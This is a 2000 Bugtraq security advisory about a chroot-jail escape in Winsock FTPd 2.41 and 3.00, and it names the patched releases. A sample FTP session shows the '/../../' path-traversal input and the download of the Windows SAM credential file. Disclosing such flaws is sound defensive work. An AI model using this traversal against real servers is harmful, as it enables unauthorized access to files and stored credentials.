Bugtraq mailing list archives
Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
From: Interstellar Overdrive <interdrive () HOME COM>
Date: Mon, 27 Nov 2000 17:21:15 +0200
[ Overdrive Advisory # 1 ] ---------------------------[ Synopsis ] Subject : Vulnerability in Winsock ftpd Application : Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro, Winsock FTPd v3.00 Pro Platform : Win32 Description : a local user can break the chroot jail Date : 11/28/2000 Author : Interstellar Overdrive E-Mail : overdrive () workspot net WWW : http://www.workspot.net/~overdrive/ --------------------------[ Application Info ] Winsock FTPd is common popular ftp server for windows95/98/3.11/NT/2K, by Texas Imperial Software it is simple, inexpensive, and easy to set ftp server for windows machines, current release is v3.0. Homepage : http://www.wftpd.com Author : Alun Jones <alun () texis com> -------------------------[ Overview ] In Winsock ftpd, there is an option called "Restrict to home directory and below" where the server makes a chroot jail for the user. lets take an example : -----snip------ c:>ftp target.com Connected to target.com User (target.com:(none)): io 331 Give me your password, please Password: XXXXXX 230 Logged in successfully ftp>pwd 257 "/" is current directory #io's directory here c:\wftpd\io #and it is chroot'ed ftp>ls 200 PORT command okay 150 File Listing Follows in ASCII mode. my_file.txt my_code.c 226 Transfer finished successfully. 11 Bytes received in 0.01 seconds (1.10 Kbytes/sec) ftp>cd ../../ 501 User is not allowed to change to ../../ - returning to /. ftp> #until now chroot jail working fine... #hmmm, lets try doing 'cd /../../' ftp>cd /../../ 250 "/../.." is current directory ftp>ls 200 PORT command okay 150 File Listing Follows in ASCII mode. wftpd inetpub DOS WINA20.386 CONFIG.DOS CONFIG.SYS WINNT AUTOEXEC.BAT Program Files TEMP COMMAND.COM .....etc # cool ! #even more fun ftp>cd /../../WINNT/repair/ 250 "/../../WINNT/repair/" is current directory ftp>get /../../WINNT/repair/sam._ 200 PORT command okay.......etc we got the file... ---------snap------- The problem is that the chroot jail only works if the user tried ../../../ not /../../../, by simply adding a "/" before ../../(which is a common known bug in win32 applications) any local user or even anonymous user can change his working directory to any directory on the server, having the ability to download any file from the server(as you saw above). In other words, the chroot jail is broken. Vulnerable Winsock FTPd Applications Found : Winsock FTPd v2.41 RC14 Winsock FTPd v2.41 RC14 Pro Winsock FTPd v3.00 Pro -----------------------------[ FIX ] Vendor contacted, A new release of Wftpd is out which fixes the problem. - Wftpd v2.41 RC15 - Wftpd v3.00 R2 <http://www.wftpd.com> -----------------------------[ Credits ] Interstellar Overdrive (interdrive () home com - overdrive () workspot net)
Current thread:
- Vulnerability in Winsock FTPD 2.41/3.00 (Pro) Interstellar Overdrive (Nov 29)